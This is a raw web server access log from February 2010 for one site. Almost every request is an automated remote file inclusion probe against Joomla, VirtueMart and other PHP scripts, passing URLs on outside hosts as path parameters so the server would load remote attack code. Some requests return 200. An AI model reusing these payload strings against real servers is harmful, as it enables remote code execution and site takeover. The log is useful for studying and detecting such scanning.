125.141.91.138 - - [13/Feb/2010:06:34:13 -0800] "GET /bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:34:14 -0800] "GET /logs/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:34:14 -0800] "GET /logs/access_100109.log%20%20/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:34:20 -0800] "GET /logs/access_100119.log%20%20/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:06:34:57 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:06:34:57 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:06:34:57 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:38 -0800] "GET /logs/access_100109.log%20%20/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:38 -0800] "GET /logs/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:38 -0800] "GET /bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:40 -0800] "GET /logs/access_100109.log/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:43 -0800] "GET /logs/access_100119.log%20%20/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:35:45 -0800] "GET /logs/access_100119.log/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:06:36:26 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:37:40 -0800] "GET /logs/access_100109.log/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:37:48 -0800] "GET /logs/access_100119.log/bbs%20...hp?option=com_custompages/index.php?option=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:06:38:37 -0800] "GET /logs/access_100107.log//main.php?sayfa=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.61.244.6 - - [13/Feb/2010:06:38:53 -0800] "GET /logs//archive.php?adminfolder=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.61.244.6 - - [13/Feb/2010:06:38:53 -0800] "GET /archive.php?adminfolder=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:39:21 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:39:21 -0800] "GET /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:39:21 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:39:57 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:40:16 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:40:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:06:40:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:06:40:21 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:06:40:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:06:40:25 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:40:29 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:40:36 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:40:52 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:40:52 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:40:59 -0800] "GET /logs/access_100204.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:41:02 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:41:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:41:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:41:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:41:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:06:41:29 -0800] "GET /logs/access_100107.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:41:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:06:41:38 -0800] "GET /logs/access_100107.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:06:42:05 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:06:42:09 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:42:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:42:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:42:53 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:43:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:43:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:43:22 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:44:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:44:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:44:00 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:44:09 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:06:45:10 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:06:45:15 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [13/Feb/2010:06:45:18 -0800] "GET /include/lib.inc.php?site_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:34 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:06:45:43 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:45 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:45:45 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:46:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:06:46:11 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:46:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:46:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:46:29 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:46:49 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:46:51 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:46:51 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:46:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:46:51 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:47:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:06:47:13 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:06:47:13 -0800] "GET /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:06:47:13 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:47:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:47:22 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:47:22 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:47:22 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:47:23 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:47:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:06:47:33 -0800] "GET /logs/access_100208.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:47:43 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:06:47:46 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:06:47:46 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:06:47:46 -0800] "GET /logs/access_100204.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:06:48:35 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [13/Feb/2010:06:49:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:19 -0800] "GET /logs/access_100127.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:19 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:19 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:22 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:22 -0800] "GET /logs/access_100127.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:22 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:26 -0800] "GET /logs/access_100129.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:49:28 -0800] "GET /logs/access_100129.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:50:49 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:50:49 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:50:49 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [13/Feb/2010:06:51:17 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:06:51:51 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:06:52:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:06:52:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:06:52:26 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:06:52:26 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
